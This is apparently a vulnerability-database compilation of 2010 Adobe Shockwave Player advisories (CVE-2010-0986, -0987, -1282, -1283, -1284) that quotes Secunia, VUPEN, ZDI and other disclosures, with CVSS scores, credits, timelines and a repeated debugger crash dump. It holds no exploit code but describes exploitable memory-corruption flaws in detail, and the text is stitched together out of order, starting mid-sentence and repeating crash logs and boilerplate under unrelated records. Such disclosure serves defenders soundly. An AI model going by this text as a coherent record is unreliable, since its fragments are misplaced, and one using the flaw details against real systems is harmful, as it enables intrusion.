use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. These people now have access to some of the best the Web has to
offer
including dazzling 3D games and entertainment, interactive product
demonstrations, and online learning applications. Shockwave Player displays
Web content that has been created by Adobe Director." from Adobe.com
II.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
These vulnerabilities were discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1284
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0102 | CVE-2010-1282 | Adobe Shockwave Player Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
Adobe Shockwave Player before 11.5.7.609 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted ATOM size in a .dir (aka Director) file. Adobe Shockwave Player is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to consume excessive resources, resulting in a denial-of-service condition.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director.Shockwave Player version 11.5.6.606 and earlier from Adobe suffers from a memory consumption / corruption and buffer overflow vulnerabilities that can aid the attacker to cause denial of service scenarios and arbitrary code execution. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. User
interaction is required in that a user must visit a malicious web site.
Exploitation can lead to remote system high cpu load ( infinite loop).
ref
http://hi.baidu.com/fs_fx/blog/item/f8de1d18ba8c9b76dbb4bd56.html
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Disclosure Timeline
===================
2010-2-6 report to vendor
2010-2-7 vendor ask poc file
2010-2-7 we sent the poc file.
2010-2-8 vendor comfirm the issue.
2010-5-11 Coordinated public release of advisory.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
| VAR-201005-0084 | CVE-2010-0986 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 does not properly process asset entries, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted Shockwave file. Adobe Shockwave Player is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
17/03/2010 - Vendor notified.
17/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0986 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-34/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0103 | CVE-2010-1283 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 does not properly parse 3D objects in .dir (aka Director) files, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a modified field in a 0xFFFFFF49 record. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.The specific flaw exists within the code responsible for parsing 3D objects defined inside Director files. These files are essentially RIFF-based, but stored in big endian format. An undocumented 4-byte field within record type 0xFFFFFF49 can be modified to cause corruption of heap memory. This corruption can be used to modify function pointers and achieve remote code execution under the context of the user running the browser. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-03-12 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. These people now have access to some of the best the Web has to
offer
including dazzling 3D games and entertainment, interactive product
demonstrations, and online learning applications. Shockwave Player displays
Web content that has been created by Adobe Director." from Adobe.com
II.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
This vulnerability was discovered by Chaouki Bekrar of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1283
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0085 | CVE-2010-0987 | Adobe Shockwave Player Heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Heap-based buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via crafted embedded fonts in a Shockwave file. Adobe Shockwave Player is prone to a buffer-overflow vulnerability.
Attackers can exploit this issue to crash the affected application and execute arbitrary code within the context of the affected application.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English).
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player.
======================================================================
6) Time Table
23/03/2010 - Vendor notified.
23/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0987 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-50/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
